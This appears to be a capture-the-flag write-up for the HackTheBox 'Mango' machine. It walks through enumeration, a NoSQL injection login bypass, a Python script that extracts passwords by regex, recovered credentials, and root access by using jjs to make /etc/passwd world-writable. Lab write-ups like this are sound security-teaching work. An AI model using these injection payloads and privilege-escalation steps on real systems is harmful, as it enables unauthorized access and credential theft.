# HackTheBox - Mango

![](/files/-MZhxH01KZOkXMzqwaP_)

### Nmap scan results

![](/files/-MZhzIHNg4SIvbIruZG9)

We have two webservers, one running with HTTP and other with HTTPS (Secure). Let's add **`staging-order.mango.htb`** to /etc/hosts file. There are two different websites running on staging-order.mango.htb. One on **HTTP** Protocol and other on **HTTPS**.

![HTTPS Website](/files/-MZi-c1tcP5KAoYDXK8N)

![HTTP Website](/files/-MZi-h3EsIHlvfsc6xIn)

I tried for SQL Injection on **Mango Search Page** but didn't get anything. Let's scan the website with gobuster for files and directories.

### Scanning with gobuster

```cpp
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://staging-order.mango.htb/ -x php,html,txt -o go-dirscan.out -t 50
```

![](/files/-MZi0Z8HxGt3SOlj1IWP)

The login page for insecure i.e HTTP website looks suspicious. Let's try SQL Injection on that.

### Trying SQL Injection on login page

![](/files/-MZi1IVSlTTFft1w8DN7)

I tried all possible SQL Injection payloads but that didn't gave me anything. `Also tried sqlmap tool to automate the process but no luck :((` 

### Performing NoSQL Injection on login page

We can also try for NoSQL Injection as the name of the box is similar to **`Mongo`** which is a NoSQL database (Uses **Key-Value** pair to store the values)

{% embed url="<https://book.hacktricks.xyz/pentesting-web/nosql-injection>" %}

{% hint style="info" %}
&#x20;**NoSQL injection** vulnerabilities allow attackers to **inject** code into commands for databases that don't use SQL queries, such as **MongoDB**.
{% endhint %}

![](/files/-MZi340rGL0VS-c_3PaE)

And now if you will check the response, it will be a redirect to **`home.php`** page.

![](/files/-MZi3Mb1soAFdDx-P74S)

![](/files/-MZi3oNqHaGp4IQvGx9L)

### Extracting usernames and passwords

But that doesn't give us anything. We can also enumerate the data and users using the same method. I have created a script to get all the users and their passwords.

```python
#!/usr/bin/env python

import requests
import string

url = "http://staging-order.mango.htb/index.php"
#chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!&(),-:;<=>@^_{}~`-[]?+"
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]

proxies = {'http':"127.0.0.1:8080"}
passw = "^"

for i in range(20):
    print "[+] Position: %s" % i
    for char in possible_chars:
        payload = {
                "username[$eq]" : "admin",
                "password[$regex]" : "{}".format(passw + char),
                "login" : "login"
        }
        res = requests.post(url,data=payload,allow_redirects=True)
        if "admin@mango.htb" in res.text:
            print("[+] Found: %s" % (passw + char))
            passw += char
            break
        else:
            pass
            
print "[+] Completed"
```

![](/files/-MZi6wenY-rsXjmAoq7m)

Similarly we can also enumerate the user and get password for that user as well.

```markup
# Got creds
admin : t9KcS3>!0B#2
mango : h3mXK8RhU~f{]f5H
```

### Using SSH to get access as mango user

![](/files/-MZi6YdlkgHNUz4GDDBk)

![Using previously found password for admin](/files/-MZi7YGvsGlLuZNC-TBj)

### Privilege Escalation using [jjs ](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/jjs.html)(Java JavaScript)

{% hint style="info" %}
If you wonder what **jjs** stands for, it stands for **Java** JavaScript. The command is located in the JDK\_HOME\bin directory. The command can be used to run scripts in files or scripts entered on the command-line in interactive mode. It can also be used to execute shell scripts.
{% endhint %}

```erlang
find / -perm -u=s -type f 2>/dev/null
```

![](/files/-MZi8T7gaIju9Jp_rKkf)

```java
// JJS Script to get command execution
Java.type('java.lang.Runtime').getRuntime().exec('chmod 777 /etc/passwd')
```

![](/files/-MZiCmtDA0YvhbCrVV7v)

Now we can edit the /etc/passwd file and change the root password. -  **`This is one way`**

Another way is to copy the **bash** file to tmp directory and then changing its permission to **`4555`** (Setuid permissions)

![](/files/-MZiEEJuhXAoZ5EEUSiO)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://akshaydeepakshinde.gitbook.io/hackthebox-linux/hackthebox-mango.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.